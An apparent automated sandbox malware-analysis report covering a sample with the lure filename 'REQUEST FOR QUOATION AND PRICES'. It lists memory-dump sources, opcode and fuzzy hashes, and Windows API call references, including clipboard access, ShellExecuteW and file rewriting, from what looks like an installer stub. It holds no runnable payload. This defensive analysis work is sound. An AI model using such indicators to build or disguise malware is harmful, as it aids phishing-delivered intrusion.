                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1513d38260a68d1f0a9cf7e1a9c831ea3f2eaa45d7588aa266858052873bfde7
                                                                                                                                • Instruction ID: 745bee7af915bdfe752c712b62c4988ce79b1f7c0e6867a9fd77c578309b543c
                                                                                                                                • Opcode Fuzzy Hash: 1513d38260a68d1f0a9cf7e1a9c831ea3f2eaa45d7588aa266858052873bfde7
                                                                                                                                • Instruction Fuzzy Hash: F5C1B174E00218CFEB14DFA5D990B9DBBB2BF89300F6081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0da3c1ade7b9455be936929b760282390739a3acbe1326e26c4179b99ef6b8e6
                                                                                                                                • Instruction ID: ea9e9c65719b3c4c0bc75813bac8dc33661685acab149760dcbd1c7e802d5388
                                                                                                                                • Opcode Fuzzy Hash: 0da3c1ade7b9455be936929b760282390739a3acbe1326e26c4179b99ef6b8e6
                                                                                                                                • Instruction Fuzzy Hash: DEC1A074E00218CFEB24DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: adb528fd54c6f96a8eddbced5db5bcc108391ea60edd35da13c7fd672b392647
                                                                                                                                • Instruction ID: 6e0255e30aaeac0733e89d8fccaf488e2ff93c3aadb070b31c496b3ed392d46c
                                                                                                                                • Opcode Fuzzy Hash: adb528fd54c6f96a8eddbced5db5bcc108391ea60edd35da13c7fd672b392647
                                                                                                                                • Instruction Fuzzy Hash: 30C1B074E00218CFEB24DFA5D990B9DBBB2BF89300F6081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 00ea30f89310aaef2fb05ba63dd8a3bf23a8e2c18d1d00581d7b4af79eda7e40
                                                                                                                                • Instruction ID: f850c507915a7e5f5941195409b1c5f792505b5de6dbc0de5689a26c7484354f
                                                                                                                                • Opcode Fuzzy Hash: 00ea30f89310aaef2fb05ba63dd8a3bf23a8e2c18d1d00581d7b4af79eda7e40
                                                                                                                                • Instruction Fuzzy Hash: 1EC1AE74E00218CFEB24DFA5C994B9DBBB2BF89300F2181A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1c79ff29ceb965ebdb72fbe568e9b076ee1736fe3d967fd267b37598149ae12d
                                                                                                                                • Instruction ID: 5dd55dfaf28688180dfb9af29dd1468e6669859e89df1e8cc27b59c169fae60c
                                                                                                                                • Opcode Fuzzy Hash: 1c79ff29ceb965ebdb72fbe568e9b076ee1736fe3d967fd267b37598149ae12d
                                                                                                                                • Instruction Fuzzy Hash: DAC1AF74E00218CFEB24DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5150b234da6758efa4e4cc9d625ec362f740c332133fe74ecd90e790152f6579
                                                                                                                                • Instruction ID: a20f8f2c70f3d2aa8832f9229737cf015d19097ce7810cd15f5d2bb11d5e7129
                                                                                                                                • Opcode Fuzzy Hash: 5150b234da6758efa4e4cc9d625ec362f740c332133fe74ecd90e790152f6579
                                                                                                                                • Instruction Fuzzy Hash: EAC1A074E00218CFEB24DFA5C994B9DBBB2BF89300F2181A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 204221892a26b8833bb00f622815942d989d04b9fc3afab5361f6cec199b467b
                                                                                                                                • Instruction ID: e2f7762dd2fe59498fb77535775bca0f1280f0d6d806eea8486e42c5ece92760
                                                                                                                                • Opcode Fuzzy Hash: 204221892a26b8833bb00f622815942d989d04b9fc3afab5361f6cec199b467b
                                                                                                                                • Instruction Fuzzy Hash: 50D09E75D5421CDBDB21DF94D8503ECF770FF99300F0160A5D48CA7210DBB15E958A56
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                                                  • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                                                • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                                                • CreatePopupMenu.USER32 ref: 00405562
                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                                                • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                                                • EmptyClipboard.USER32 ref: 004055FD
                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                                                • CloseClipboard.USER32 ref: 00405658
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                • String ID: {
                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                • Opcode ID: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                                                • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                                                • Opcode Fuzzy Hash: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                                                • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                                                • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                                                • DestroyWindow.USER32 ref: 00403CC4
                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                                                • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                                                • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 184305955-0
                                                                                                                                • Opcode ID: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                                                • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                                                • Opcode Fuzzy Hash: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                                                • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                  • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                  • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                • lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,771B3420,00000000,00434000), ref: 00403935
                                                                                                                                • lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B5
                                                                                                                                • lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                                                • GetFileAttributesW.KERNEL32(00427180), ref: 004039D3
                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1C
                                                                                                                                  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                                                • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AED
                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                                                • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                • API String ID: 914957316-1115850852
                                                                                                                                • Opcode ID: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                                                • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                                                • Opcode Fuzzy Hash: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                                                • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D
                                                                                                                                APIs
                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                                                • GetSysColor.USER32(?), ref: 004043AC
                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                                                                • SetCursor.USER32(00000000), ref: 004044CE
                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                                                                • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                • String ID: CB@$N$open
                                                                                                                                • API String ID: 3615053054-4029390422
                                                                                                                                • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                                                                • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                                                                APIs
                                                                                                                                • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                                                  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                                                • wsprintfA.USER32 ref: 00405C80
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                                                  • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                                                  • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                                                • API String ID: 1265525490-3322868524
                                                                                                                                • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                                                • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                                                • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                                                • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                                                APIs
                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                • String ID: F
                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                                                • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                                • lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 00404731
                                                                                                                                • lstrcatW.KERNEL32(?,00427180), ref: 0040473D
                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
